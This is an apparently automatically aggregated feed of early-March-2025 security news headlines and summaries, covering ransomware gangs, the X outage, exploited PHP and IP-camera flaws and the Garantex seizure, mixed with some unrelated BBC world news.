    Autosummary: Large-scale cryptocurrency miner campaign targets Russian users with SilentCryptoMiner. Pierluigi Paganini, March 10, 2025. Experts warn of a large-scale cryptocurrency miner campaign targeting Russian users with SilentCryptoMiner. Using this social engineering trick, threats like stealers, RATs, Trojans, and crypto miners can persist undetected.


    FTC will send $25.5 million to victims of tech support scams

    financial
    2025-03-10 https://www.bleepingcomputer.com/news/security/ftc-will-send-255-million-to-victims-of-tech-support-scams/
    Later this week, the Federal Trade Commission (FTC) will start distributing over $25.5 million in refunds to those misled by tech support companies Restoro and Reimage's scare tactics. [...]

    Autosummary: Even though devices used to test the purchased services had no performance or security issues and were running antivirus software, scanning them using the two companies' software "revealed" hundreds of issues requiring repair, including "PC Privacy issues," "Crashed Programs," "Junk files," and "Broken Registry issues."


    Swiss critical sector faces new 24-hour cyberattack reporting rule

    ciber
    2025-03-10 https://www.bleepingcomputer.com/news/security/swiss-critical-sector-faces-new-24-hour-cyberattack-reporting-rule/
    Switzerland's National Cybersecurity Centre (NCSC) has announced a new reporting obligation for critical infrastructure organizations in the country, requiring them to report cyberattacks to the agency within 24 hours of their discovery. [...]


    Google paid $12 million in bug bounties last year to security researchers

    exploits
    2025-03-10 https://www.bleepingcomputer.com/news/security/google-paid-12-million-in-bug-bounties-last-year-to-security-researchers/
    Google paid almost $12 million in bug bounty rewards to 660 security researchers who reported security bugs through the company's Vulnerability Reward Program (VRP) in 2024. [...]


    Review: The Cybersecurity Trinity

    ciber
    2025-03-10 https://www.helpnetsecurity.com/2025/03/10/review-the-cybersecurity-trinity/

    The Cybersecurity Trinity provides a comprehensive approach to modern cybersecurity by integrating AI, automation, and active cyber defense (ACD) into a unified strategy. Instead of addressing these elements in isolation, the author demonstrates how they work together to enhance security effectiveness, offering a practical and actionable framework grounded in the NIST Cybersecurity Framework. About the author Donnie Wendt, an adjunct professor of cybersecurity at Utica University, brings over 30 years of hands-on experience in cybersecurity, … More

    The post Review: The Cybersecurity Trinity appeared first on Help Net Security.

    "

    Autosummary: About the author Donnie Wendt, an adjunct professor of cybersecurity at Utica University, brings over 30 years of hands-on experience in cybersecurity, combining practical implementation expertise with academic research to explore security strategies. "


    Pondurance Platform 2.0 identifies data breach risks

    financial
    2025-03-10 https://www.helpnetsecurity.com/2025/03/10/pondurance-platform-2-0/

    Pondurance announced a major new version of its cybersecurity platform. Pondurance Platform 2.0 provides the foundation for Pondurance’s risk-based MDR service specifically designed to eliminate breach risks. With this announcement, Pondurance arms customers with the latest monitoring, detection, and response capabilities through a new platform that encompasses everything organizations entrusted with personal customer information need to protect themselves from breach risks. This unified portal enables them to detect, respond to, and remediate cyber threats in … More

    The post Pondurance Platform 2.0 identifies data breach risks appeared first on Help Net Security.

    "

    Autosummary: The core of this new platform is the technology that integrates with EDR tools and feeds from network, identity, cloud, and applications sources in order to analyze this telemetry information, bubble up the highest-risk threats that have been detected, and triage and take action, if necessary. “Our newly released Pondurance Platform 2.0 represents the culmination of a yearslong effort to reinvent a cloud-native, AI-enabled platform in order to use risk-based algorithms and methodologies for cybersecurity threat detection, response, and automated disruption,” said Enzo Arefi, CTO at Pondurance. With a single click, it can ingest logs from a selection of hundreds of network, identity, cloud, and application devices and software and will access world-class threat intelligence, bubble up the ones most likely to create data breach risks, and take remediation action. "


    Experts warn of mass exploitation of critical PHP flaw CVE-2024-4577

    exploits
    2025-03-10 https://securityaffairs.com/175198/hacking/experts-warn-of-mass-exploitation-of-critical-php-flaw-cve-2024-4577.html
    Threat actors exploit PHP flaw CVE-2024-4577 for remote code execution. Over 1,000 attacks detected globally. GreyNoise researchers warn of a large-scale exploitation of a critical vulnerability, tracked as CVE-2024-4577 (CVSS 9.8), in PHP. An attacker could exploit the vulnerability to achieve remote code execution on vulnerable servers using Apache and PHP-CGI. The flaw CVE-2024-4577 (CVSS score: 9.8) is […] "

    Autosummary: In July 2024, the Akamai Security Intelligence Response Team (SIRT) warned that multiple threat actors were exploiting the PHP vulnerability CVE-2024-4577 to deliver multiple malware families, including Gh0st RAT, RedTail cryptominers, and XMRig. “Threat actors continued the speedy-time-from-disclosure-to-exploitation trend and were quick to leverage this new vulnerability — we observed exploit attempts targeting this PHP flaw on our honeypot network within 24 hours of its disclosure.” reported Akamai. "


    X hit by ‘massive cyberattack’ amid Dark Storm’s DDoS claims

    ciber
    2025-03-10 https://www.bleepingcomputer.com/news/security/x-hit-by-massive-cyberattack-amid-dark-storms-ddos-claims/
    The Dark Storm hacktivist group claims to be behind DDoS attacks causing multiple worldwide outages of X on Monday, leading the company to enable DDoS protections from Cloudflare. [...] "

    Autosummary: "


    X users report login troubles as Dark Storm claims cyberattack

    ciber
    2025-03-10 https://www.malwarebytes.com/blog/news/2025/03/x-users-report-login-troubles-as-dark-storm-claims-cyberattack
    In the early morning hours of March 10, thousands of users on X (formerly Twitter) began having trouble logging into the... "

    Autosummary: "


    Elon Musk blames a massive cyberattack for the X outages

    ciber
    2025-03-10 https://securityaffairs.com/175209/hacking/elon-musk-x-ddos-attack-dark-dark-storm-team.html
    Elon Musk said that the global outages impacting his platform X during the day are being caused by a cyberattack. A major cyber attack appears to be the root cause of the global outage on X, according to its CEO Elon Musk. About 40,000 users reported issues accessing Twitter, according to Downdetector.com. Musk has provided […] "

    Autosummary: “This is amongst the longest Twitter outages tracked in terms of duration, and the pattern is consistent with a denial of service attack targeting X’s infrastructure at scale,” Alp Toker, director of internet monitor Netblocks, told Recorded Future News. "


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 36

    exploits
    2025-03-09 https://securityaffairs.com/175124/malware/security-affairs-malware-newsletter-round-36.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Cellebrite zero-day exploit used to target phone of Serbian student activist   One in Four Cyberattacks in 2024 Traced to Infostealers, Huntress Reports   Uncovering .NET Malware Obfuscated by Encryption and Virtualization   Black Basta and Cactus Ransomware Groups […] "

    Autosummary: "


    US cities warn of wave of unpaid parking phishing texts

    financial
    2025-03-09 https://www.bleepingcomputer.com/news/security/us-cities-warn-of-wave-of-unpaid-parking-phishing-texts/
    US cities are warning of an ongoing mobile phishing campaign pretending to be texts from the city's parking violation departments about unpaid parking invoices that, if unpaid, will incur an additional $35 fine per day. [...] "

    Autosummary: While parking scams have been around for years, a massive wave of phishing text messages has caused numerous cities throughout the US to issue warnings, including from Annapolis, Boston, Greenwich, Denver, Detroit, Houston, Milwaukee, Salt Lake City, Charlotte, San Diego, San Francisco, and many others. "


    YouTubers extorted via copyright strikes to spread malware

    exploits
    2025-03-08 https://www.bleepingcomputer.com/news/security/youtubers-extorted-via-copyright-strikes-to-spread-malware/
    Cybercriminals are sending bogus copyright claims to YouTubers to coerce them into promoting malware and cryptocurrency miners on their videos. [...] "

    Autosummary: Eventually, it downloads the final payload, SilentCryptoMiner, a modified version of XMRig capable of mining multiple cryptocurrencies, including ETH, ETC, XMR, and RTM. "


    Japanese telecom giant NTT suffered a data breach that impacted 18,000 companies

    financial Telcos
    2025-03-08 https://securityaffairs.com/175090/data-breach/japanese-telecom-giant-ntt-data-breach.html
    A data breach suffered by the Japanese telecom giant NTT exposed information of nearly 18,000 corporate customers. Japanese telecom giant NTT suffered a data breach that exposed information of nearly 18,000 corporate customers. On February 5th, the security team detected suspicious activity in its ‘Order Information Distribution System,’ and immediately restricted access to device A. […] "

    Autosummary: Potentially exposed information includes contract number, customer name (contract name), name of customer contact, telephone number, email address, address, information related to service use. "


    Pope Francis responding well to treatment, Vatican says

    financial
    2025-03-08 https://www.bbc.com/news/articles/cjw27gnjjjyo
    The 88-year-old prayed on Saturday morning in the chapel of the papal suite at Rome"s Gemelli Hospital, the Vatican said. "

    Autosummary: "


    Akira ransomware gang used an unsecured webcam to bypass EDR

    exploits ransomware
    2025-03-08 https://securityaffairs.com/175103/cyber-crime/akira-ransomware-gang-used-unsecured-webcam-bypass-edr.html
    The Akira ransomware gang exploited an unsecured webcam to bypass EDR and launch encryption attacks on a victim’s network. Cybersecurity researchers at S-RM discovered a novel attack technique used by the Akira ransomware gang. The ransomware group used an unsecured webcam to encrypt systems within a target’s network, bypassing Endpoint Detection and Response (EDR). The […] "

    Autosummary: Akira ransomware gang used an unsecured webcam to bypass EDR Pierluigi Paganini March 08, 2025 The Akira ransomware gang exploited an unsecured webcam to bypass EDR and launch encryption attacks on a victim’s network. The Akira ransomware has been active since March 2023; the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. "


    PHP-CGI RCE Flaw Exploited in Attacks on Japan's Tech, Telecom, and E-Commerce Sectors

    exploits Telcos
    2025-03-07 https://thehackernews.com/2025/03/php-cgi-rce-flaw-exploited-in-attacks.html
    Threat actors of unknown provenance have been attributed to a malicious campaign predominantly targeting organizations in Japan since January 2025. "The attacker has exploited the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines," Cisco Talos researcher Chetan Raghuprasad said in a technical "

    Autosummary: "


    Qilin Ransomware gang claims the hack of the Ministry of Foreign Affairs of Ukraine

    exploits ransomware
    2025-03-07 https://securityaffairs.com/175025/cyber-crime/qilin-ransomware-ministry-of-foreign-affairs-of-ukraine.html
    Qilin Ransomware group claims to have breached the Ministry of Foreign Affairs of Ukraine, marking a significant cybersecurity attack. The Russian-speaking Qilin Ransomware group claims responsibility for an attack on the Ministry of Foreign Affairs of Ukraine. The group stated that it stole sensitive data such as private correspondence, personal information, and official decrees. The […] "

    Autosummary: Qilin Ransomware gang claims the hack of the Ministry of Foreign Affairs of Ukraine Pierluigi Paganini March 07, 2025 Qilin Ransomware group claims to have breached the Ministry of Foreign Affairs of Ukraine, marking a significant cybersecurity attack. "


    Can AI-powered gamified simulations help cybersecurity teams keep up?

    ciber
    2025-03-07 https://www.helpnetsecurity.com/2025/03/07/ai-gamified-simulations-cybersecurity/

    Traditional training often lacks the hands-on experience cybersecurity teams need to counter advanced threats. AI-powered gamified simulations combine artificial intelligence with interactive learning to enhance their skills. Conventional cybersecurity training programs frequently rely on static content, which can become outdated. These programs may also lack the engagement necessary to maintain participant interest, leading to suboptimal retention of critical skills. In contrast, gamified simulations introduce dynamic, scenario-based learning environments that mirror real-world cyber threats, fostering more … More

    The post Can AI-powered gamified simulations help cybersecurity teams keep up? appeared first on Help Net Security.

    "

    Autosummary: In contrast, gamified simulations introduce dynamic, scenario-based learning environments that mirror real-world cyber threats, fostering more profound understanding and retention. "


    Microsoft: North Korean hackers join Qilin ransomware gang

    exploits ransomware
    2025-03-07 https://www.bleepingcomputer.com/news/security/microsoft-north-korean-hackers-now-deploying-qilin-ransomware/
    Microsoft says a North Korean hacking group tracked as Moonstone Sleet has deployed Qilin ransomware payloads in a limited number of attacks. [...] "

    Autosummary: Microsoft says Moonstone Sleet hackers are targeting both financial and cyberespionage targets using trojanized software (e.g., PuTTY), custom malware loaders, malicious games and npm packages, and fake software development companies (e.g., C.C. Waterfall, StarGlow Ventures) set up to interact with potential victims on LinkedIn, various freelancing networks, Telegram, or via email. "


    Armis acquires OTORIO to strengthen OT and IoT security

    industry
    2025-03-07 https://www.helpnetsecurity.com/2025/03/07/armis-otorio-acquisition/

    Armis has acquired OTORIO, a provider of OT/ICS cyber security solutions. This accelerates Armis’ rollout of an on-premises version of its Cyber Exposure Management platform, Armis Centrix, and cements its leadership in cyber physical systems (CPS) security. Armis will fully integrate OTORIO’s Titan platform into Armis Centrix, delivering a single, comprehensive solution for critical infrastructure, manufacturing and industrial environments: Armis Centrix for OT/IoT Security (On-Prem) ensures robust, localised protection for air-gapped or … More

    The post Armis acquires OTORIO to strengthen OT and IoT security appeared first on Help Net Security.

    "

    Autosummary: Secure remote access (SRA) : Enforce MFA, SSO, and access policies on all users, devices, workloads, applications, and data across all cloud, datacenter, and cyber-physical infrastructure. "


    U.S. Secret Service Seizes Russian Garantex Crypto Exchange Website

    rusia-ucrania
    2025-03-07 https://thehackernews.com/2025/03/us-secret-service-seizes-russian.html
    A coalition of international law enforcement agencies has seized the website associated with the cryptocurrency exchange Garantex ("garantex[.]org"), nearly three years after the service was sanctioned by the U.S. Treasury Department in April 2022. "The domain for Garantex has been seized by the United States Secret Service pursuant to a seizure warrant obtained by the United States Attorney's "

    Autosummary: "


    International law enforcement operation seized the domain of the Russian crypto exchange Garantex

    rusia-ucrania
    2025-03-07 https://securityaffairs.com/175049/cyber-crime/international-law-enforcement-operation-seized-the-domain-of-the-russian-crypto-exchange-garantex.html
    The U.S. Secret Service and global law enforcement seized the domain of sanctioned Russian crypto exchange Garantex. An international law enforcement operation led by U.S. Secret Service seized the website (“garantex[.]org”) of the sanctioned Russian crypto exchange Garantex. In April 2022, the US Treasury Department sanctioned the virtual currency exchange. Garantex has been active since 2019, […] "

    Autosummary: The operation involved the U.S. DOJ, FBI, Europol, and law enforcement from Germany, the Netherlands, Finland, and Estonia. "


    Medusa Ransomware targeted over 40 organizations in 2025

    exploits ransomware
    2025-03-07 https://securityaffairs.com/175013/malware/medusa-ransomware-targeted-over-40-organizations-in-2025.html
    Medusa ransomware has claimed nearly 400 victims since January 2023, with attacks increasing by 42% between 2023 and 2024. The Symantec Threat Hunter Team reported that the Medusa ransomware operators have claimed nearly 400 victims since January 2023. Experts observed a 42% increase in attacks carried out by the group between 2023 and 2024. Experts […] "

    Autosummary: Medusa Ransomware targeted over 40 organizations in 2025 Pierluigi Paganini March 07, 2025 Medusa ransomware has claimed nearly 400 victims since January 2023, with attacks increasing by 42% between 2023 and 2024. "


    US charges Garantex admins with money laundering, sanctions violations

    financial
    2025-03-07 https://www.bleepingcomputer.com/news/security/us-charges-garantex-admins-with-money-laundering-sanctions-violations/
    The administrators of the Russian Garantex crypto-exchange have been charged in the United States with facilitating money laundering for criminal organizations and violating sanctions. [...] "

    Autosummary: The Russian exchange was previously sanctioned by the Treasury Department's Office of Foreign Assets Control (OFAC) in April 2022 after over $100 million in Garantex transactions were linked to darknet markets and cybercrime actors, including the notorious Conti Ransomware-as-a-service (RaaS) operation and the Hydra dark web market. "


    Data breach at Japanese telecom giant NTT hits 18,000 companies

    financial Telcos
    2025-03-07 https://www.bleepingcomputer.com/news/security/data-breach-at-japanese-telecom-giant-ntt-hits-18-000-companies/
    Japanese telecommunication services provider NTT Communications Corporation (NTT) is warning almost 18,000 corporate customers that their information was compromised during a cybersecurity incident. [...] "

    Autosummary: "


    FIN7, FIN8, and Others Use Ragnar Loader for Persistent Access and Ransomware Operations

    exploits ransomware
    2025-03-07 https://thehackernews.com/2025/03/fin7-fin8-and-others-use-ragnar-loader.html
    Threat hunters have shed light on a "sophisticated and evolving malware toolkit" called Ragnar Loader that's used by various cybercrime and ransomware groups like Ragnar Locker (aka Monstrous Mantis), FIN7, FIN8, and Ruthless Mantis (ex-REvil). "Ragnar Loader plays a key role in keeping access to compromised systems, helping attackers stay in networks for long-term operations," Swiss "

    Autosummary: "It employs advanced obfuscation, encryption, and anti-analysis techniques, including PowerShell-based payloads, RC4 and Base64 decryption routines, dynamic process injection, token manipulation, and lateral movement capabilities," PRODAFT said. "


    Argentine city left flooded after fierce storm

    government
    2025-03-07 https://www.bbc.com/news/articles/c4g07dqep0ko
    The city of Bahía Blanca has suffered the equivalent of four months' rainfall in just four hours. "

    Autosummary: "


    Unpatched Edimax IP camera flaw actively exploited in botnet attacks

    exploits
    2025-03-07 https://www.bleepingcomputer.com/news/security/unpatched-edimax-ip-camera-flaw-actively-exploited-in-botnet-attacks/
    A critical command injection vulnerability impacting the Edimax IC-7100 IP camera is currently being exploited by botnet malware to compromise devices. [...] "

    Autosummary: "I personally reached out to them and received a response, but all they said was that the device in question, IC-7100, was end of life, therefore not receiving further updates. "


    Mirai-based botnets exploit CVE-2025-1316 zero-day in Edimax IP cameras

    exploits
    2025-03-07 https://securityaffairs.com/175060/hacking/mirai-based-botnets-exploit-cve-2025-1316-zero-day-in-edimax-ip-cameras.html
    Mirai-based botnets are exploiting a zero-day flaw, tracked as CVE-2025-1316, in Edimax IP cameras to achieve remote command execution. US CISA warns that multiple botnets are exploiting a recently disclosed vulnerability, tracked as CVE-2025-1316 (CVSS score of 9.8), in Edimax IC-7100 IP cameras. The issue is an Improper Neutralization of Special Elements used in an […] "

    Autosummary: Mirai-based botnets exploit CVE-2025-1316 zero-day in Edimax IP cameras Pierluigi Paganini March 07, 2025 Mirai-based botnets are exploiting a zero-day flaw, tracked as CVE-2025-1316, in Edimax IP cameras, to achieve remote command execution. "


    U.S. Charges 12 Chinese Nationals in State-Backed Hacking Operations

    government
    2025-03-06 https://thehackernews.com/2025/03/us-charges-12-chinese-nationals-in.html
    The U.S. Department of Justice (DoJ) has announced charges against 12 Chinese nationals for their alleged participation in a wide-ranging scheme designed to steal data and suppress free speech and dissent globally. The individuals include two officers of the People's Republic of China's (PRC) Ministry of Public Security (MPS), eight employees of an ostensibly private PRC company, Anxun "

    Autosummary: The individuals include two officers of the People's Republic of China's (PRC) Ministry of Public Security (MPS), eight employees of an ostensibly private PRC company, Anxun Information Technology Co. Ltd. (安洵信息技术有限公司) also known as i-Soon, and members of Advanced Persistent Threat 27 (APT27, aka Budworm, Bronze Union, Emissary Panda, Lucky Mouse, and Iron Tiger): Wu Haibo (吴海波), Chief Executive Officer; Chen Cheng (陈诚), Chief Operating Officer; Wang Zhe (王哲), Sales Director; Liang Guodong (梁国栋), Technical Staff; Ma Li (马丽), Technical Staff; Wang Yan (王堰), Technical Staff; Xu Liang (徐梁), Technical Staff; Zhou Weiwei (周伟伟), Technical Staff; Wang Liyu (王立宇), MPS Officer; Sheng Jing (盛晶), MPS Officer; Yin Kecheng (尹可成), APT27 actor aka "YKC"; Zhou Shuai (周帅), APT27 actor aka "Coldface". "These malicious cyber actors, acting as freelancers or as employees of i-Soon, conducted computer intrusions at the direction of the PRC's MPS and Ministry of State Security (MSS) and on their own initiative," the DoJ said. "


    Carmakers win break from Trump's tariffs on Canada and Mexico

    latam
    2025-03-06 https://www.bbc.com/news/articles/c62zn47d5j1o
    Trump says he will exempt cars from the new import taxes, while continuing his criticism of Canada. "

    Autosummary: I just hope that it ends quickly," said Iowa farmer Bob Hemesath, the board president for lobby group Farmers for Free Trade, which has raised concerns about the tariffs. "


    Month of bank IT failures in the last two years, MPs say

    financial
    2025-03-06 https://www.bbc.com/news/articles/cjd3yzx3xgvo
    The MPs have also discovered millions of pounds of compensation will be paid out because of the spate of outages. "

    Autosummary: The Treasury Committee - which has been investigating the impact of banking IT failures - compelled Barclays, HSBC, Lloyds, Nationwide, Santander, NatWest, Danske Bank, Bank of Ireland and Allied Irish Bank to provide the data. "


    Elastic Releases Urgent Fix for Critical Kibana Vulnerability Enabling Remote Code Execution

    exploits
    2025-03-06 https://thehackernews.com/2025/03/elastic-releases-urgent-fix-for.html
    Elastic has rolled out security updates to address a critical security flaw impacting the Kibana data visualization dashboard software for Elasticsearch that could result in arbitrary code execution. The vulnerability, tracked as CVE-2025-25012, carries a CVSS score of 9.9 out of a maximum of 10.0. It has been described as a case of prototype pollution. "Prototype pollution in Kibana leads to "

    Autosummary: "


    EncryptHub Deploys Ransomware and Stealer via Trojanized Apps, PPI Services, and Phishing

    financial exploits ransomware
    2025-03-06 https://thehackernews.com/2025/03/encrypthub-deploys-ransomware-and.html
    The financially motivated threat actor known as EncryptHub has been observed orchestrating sophisticated phishing campaigns to deploy information stealers and ransomware, while also working on a new product called EncryptRAT. "EncryptHub has been observed targeting users of popular applications, by distributing trojanized versions," Outpost24 KrakenLabs said in a new report shared with The "

    Autosummary: These changes underscore active tweaks to EncryptHub's kill chain, with the threat actor also developing new components like EncryptRAT, a command-and-control (C2) panel to manage active infections, issue remote commands, and access stolen data. "


    Medusa Ransomware Hits 40+ Victims in 2025, Demands $100K–$15M Ransom

    exploits ransomware
    2025-03-06 https://thehackernews.com/2025/03/medusa-ransomware-hits-40-victims-in.html
    The threat actors behind the Medusa ransomware have claimed nearly 400 victims since it first emerged in January 2023, with the financially motivated attacks witnessing a 42% increase between 2023 and 2024. In the first two months of 2025 alone, the group has claimed over 40 attacks, according to data the Symantec Threat Hunter Team shared with The Hacker News in a report. The "

    Autosummary: The development comes as the ransomware landscape continues to be in a state of flux, with a steady stream of new RaaS operations, such as Anubis, CipherLocker, Core, Dange, LCRYX, Loches, Vgod, and Xelera, emerging in the wild in recent months. "


    The U.S. DoJ charges 12 Chinese nationals for state-linked cyber operations

    government
    2025-03-06 https://securityaffairs.com/174986/cyber-warfare-2/u-s-department-of-justice-doj-charges-12-chinese-nationals.html
    The U.S. Department of Justice (DoJ) charges 12 Chinese nationals for their alleged involvement in state-linked cyber operations. The U.S. DoJ charged 12 Chinese nationals, including PRC security officers, employees of the hacking firm i-Soon, and members of the APT27 group (aka Emissary Panda, TG-3390, Bronze Union, and Lucky Mouse), for data theft and suppressing dissent worldwide. “The Justice […] "

    Autosummary: “HAIBO, 43; CHENG, 40; GUODONG, 32; LI, 31; YAN, 35; ZHE, 44; WEIWEI, 37; LIANG, 28; LIYU, 36; and JING, 36, all nationals of China, are charged with conspiracy to commit computer intrusions, which carries a maximum sentence of five years in prison, and conspiracy to commit wire fraud, which carries a maximum sentence of 20 years in prison.” concludes the announcement. The US authorities are offering a reward for the following individuals: Wu Haibo (吴海波), Chief Executive Officer; Chen Cheng (陈诚), Chief Operating Officer; Wang Zhe (王哲), Sales Director; Liang Guodong (梁国栋), Technical Staff; Ma Li (马丽), Technical Staff; Wang Yan (王堰), Technical Staff; Xu Liang (徐梁), Technical Staff; Zhou Weiwei (周伟伟), Technical Staff "


    Free vCISO Course: Turning MSPs and MSSPs into Cybersecurity Powerhouses

    ciber
    2025-03-06 https://www.bleepingcomputer.com/news/security/free-vciso-course-turning-msps-and-mssps-into-cybersecurity-powerhouses/
    The vCISO Academy is a free learning platform to equip service providers with training needed to build and expand their vCISO offerings. Learn more from Cynomi on how the Academy helps you launch or expand your vCISO services. [...] "

    Autosummary: Key features of the academy include: Expert guidance from industry experts who share their practical knowledge and experience on a wide range of essential vCISO functions, including risk and compliance assessments, cybersecurity strategy development, and effective communication of risks to executive teams. The Expertise Gap in Delivering vCISO Services: While the market for vCISO services is rapidly expanding, many MSPs and MSSPs struggle to offer these services due to lack of in-house expertise and resources. "


    Ransomware threat mailed in letters to business owners

    exploits
    2025-03-06 https://www.malwarebytes.com/blog/news/2025/03/ransomware-threat-mailed-in-letters-to-business-owners
    CEOs and business owners received personal, customized ransomware threats in a series of letters sent in the mail through USPS. "

    Autosummary: I regret to inform you that we have gained access to [REDACTED] systems and over the past several weeks have exported thousands of data files, including customer order and contact information, employee information with IDs, SSNs, payroll reports, and other sensitive HR documents, company financial documents, legal documents, investor and shareholder information, invoices, and tax documents. "


    Cybersecurity jobs available right now in the USA: March 6, 2025

    ciber
    2025-03-06 https://www.helpnetsecurity.com/2025/03/06/cybersecurity-jobs-available-right-now-in-the-usa-march-6-2025/

    CISO Amplitude | USA | Hybrid As a CISO, you will develop, implement, and maintain a comprehensive security strategy aligned with Amplitude’s business goals and risk tolerance. Oversee the identification, assessment, and mitigation of security risks across the organization and its product lines. Lead and coordinate investigations into security incidents, ensuring timely resolution and thorough post-incident reviews. Cloud Cyber Security Technical Advisor (GRC) – VP MUFG | USA | On-site – … More

    The post Cybersecurity jobs available right now in the USA: March 6, 2025 appeared first on Help Net Security.

    "

    Autosummary: Cyber Security Engineer, Senior Consultant – Cloud Security Visa | USA | Hybrid As a Cyber Security Engineer, Senior Consultant – Cloud Security, you will be responsible for security architecture for hybrid cloud and support design of cloud solutions meeting standardization, consolidation, security, and regulatory compliance, for different use cases. Cybersecurity Engineer Ace Hardware | USA | On-site As a Cybersecurity Engineer, you will implement and configure security solutions, such as firewalls, encryption, authentication, authorization, logging, and monitoring, to protect web applications from cyberattacks and ensure compliance with security policies and regulations. Principal Incident Response Engineer Acrisure | USA | On-site As a Principal Incident Response Engineer, you will develop and implement incident response plans, including threat detection, investigation, containment, eradication, and recovery. Cyber Defense Incident Responder Edgewater Federal Solutions | USA | Hybrid As a Cyber Defense Incident Responder, you will perform cyber defense incident triage, to include determining scope, urgency, and potential impact, identifying the specific vulnerability, and making recommendations that enable expeditious remediation. "


    Trump announces month-long suspension of Mexico tariffs

    latam
    2025-03-06 https://www.bbc.com/news/articles/c5y03qleevvo
    Mexico will not be required to pay tariffs on goods that come under the trade pact between the two countries and Canada until 2 April. "

    Autosummary: "


    Ransomware gang encrypted network from a webcam to bypass EDR

    exploits
    2025-03-06 https://www.bleepingcomputer.com/news/security/akira-ransomware-encrypted-network-from-a-webcam-to-bypass-edr/
    The Akira ransomware gang was spotted using an unsecured webcam to launch encryption attacks on a victim's network, effectively circumventing Endpoint Detection and Response (EDR), which was blocking the encryptor in Windows. [...] "

    Autosummary: Eventually, the threat actors dropped a password-protected ZIP file (win.zip) containing the ransomware payload (win.exe), but the victim's EDR tool detected and quarantined it, essentially blocking the attack. "


    US seizes domain of Garantex crypto exchange used by ransomware gangs

    exploits ransomware
    2025-03-06 https://www.bleepingcomputer.com/news/security/us-seizes-domain-of-garantex-crypto-exchange-used-by-ransomware-gangs/
The U.S. Secret Service has seized the domain of the sanctioned Russian cryptocurrency exchange Garantex in collaboration with the Department of Justice's Criminal Division, the FBI, and Europol. [...] "

    Autosummary: "


As US and Canada trade barbs, it's so far so good for Mexico's Sheinbaum

    latam
    2025-03-06 https://www.bbc.com/news/articles/c0q1l398wz3o
Donald Trump and Justin Trudeau's clear tensions are a stark contrast to the Mexican leader's approach to the White House. "

Autosummary: Will Grant, Mexico Correspondent, BBC News. Watch: Call with Trump "very, very respectful", says Mexico's Sheinbaum. In announcing the decision to postpone some tariffs on Mexico for another month, US President Donald Trump was at pains to praise his Mexican counterpart, Claudia Sheinbaum. "


    Ransomware gang encrypted network from a webcam to bypass EDR

    exploits
    2025-03-06 https://www.bleepingcomputer.com/news/security/ransomware-gang-encrypted-network-from-a-webcam-to-bypass-edr/
The Akira ransomware gang was spotted using an unsecured webcam to launch encryption attacks on a victim's network, effectively circumventing Endpoint Detection and Response (EDR), which was blocking the encryptor in Windows. [...] "

Autosummary: Eventually, the threat actors dropped a password-protected ZIP file (win.zip) containing the ransomware payload (win.exe), but the victim's EDR tool detected and quarantined it, essentially blocking the attack. "


    Fake BianLian ransom notes mailed to US CEOs in postal mail scam

    financial
    2025-03-05 https://www.bleepingcomputer.com/news/security/fake-bianlian-ransom-notes-mailed-to-us-ceos-in-postal-mail-scam/
    Scammers are impersonating the BianLian ransomware gang in fake ransom notes sent to US companies via snail mail through the United States Postal Service. [...] "

    Autosummary: "I regret to inform you that we have gained access to [REDACTED] systems and over the past several weeks have exported thousands of data files, including customer order and contact information, employee information with IDs, SSNs, payroll reports, and other sensitive HR documents, company financial documents, legal documents, investor and shareholder information, invoices, and tax documents," reads a fake BianLian ransom note. "


    Omega Systems’ Enterprise Password Management solution reduces the risk of cyberattacks

    ciber
    2025-03-05 https://www.helpnetsecurity.com/2025/03/05/omega-systems-enterprise-password-management/

Omega Systems has expanded its cybersecurity offerings with the addition of a new Enterprise Password Management solution to help companies minimize the risk of password-related cyberattacks. Omega’s fully managed password solution is the latest addition to the company’s managed security service portfolio, which is designed to help businesses counter a dangerous threat landscape. “Businesses are facing security threats at every turn, but credential theft remains one of the most dangerous and prolific attack vectors for hackers … More

    The post Omega Systems’ Enterprise Password Management solution reduces the risk of cyberattacks appeared first on Help Net Security.

    "

    Autosummary: "


    Scammers take over social media

    financial
    2025-03-05 https://www.helpnetsecurity.com/2025/03/05/social-media-scams-video/

    In Q4 2024, cyber threats reached unprecedented levels, with 2.55 billion attacks blocked, equating to 321 threats every second. In this Help Net Security video, Luis Corrons, Security Evangelist at Gen, discusses a new Gen report that highlights a troubling trend: social media has become a prime target for cybercriminals, who are leveraging AI-driven scams, malvertising, and phishing tactics to exploit users at scale. Here’s what you need to know: Facebook is the biggest target, … More

    The post Scammers take over social media appeared first on Help Net Security.

    "

    Autosummary: "


    Seven Malicious Go Packages Found Deploying Malware on Linux and macOS Systems

    exploits Linux
    2025-03-05 https://thehackernews.com/2025/03/seven-malicious-go-packages-found.html
Cybersecurity researchers are warning of an ongoing malicious campaign targeting the Go ecosystem with typosquatted modules that are designed to deploy loader malware on Linux and Apple macOS systems. "The threat actor has published at least seven packages impersonating widely used Go libraries, including one (github[.]com/shallowmulti/hypert) that appears to target financial-sector developers "

    Autosummary: "


    U.S. CISA adds Linux kernel and VMware ESXi and Workstation flaws to its Known Exploited Vulnerabilities catalog

    exploits Linux
    2025-03-05 https://securityaffairs.com/174923/security/u-s-cisa-adds-linux-kernel-and-vmware-esxi-and-workstation-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Linux kernel and VMware ESXi and Workstation flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The first issue, tracked as CVE-2024-50302, was addressed by Google with the release of the Android […] "

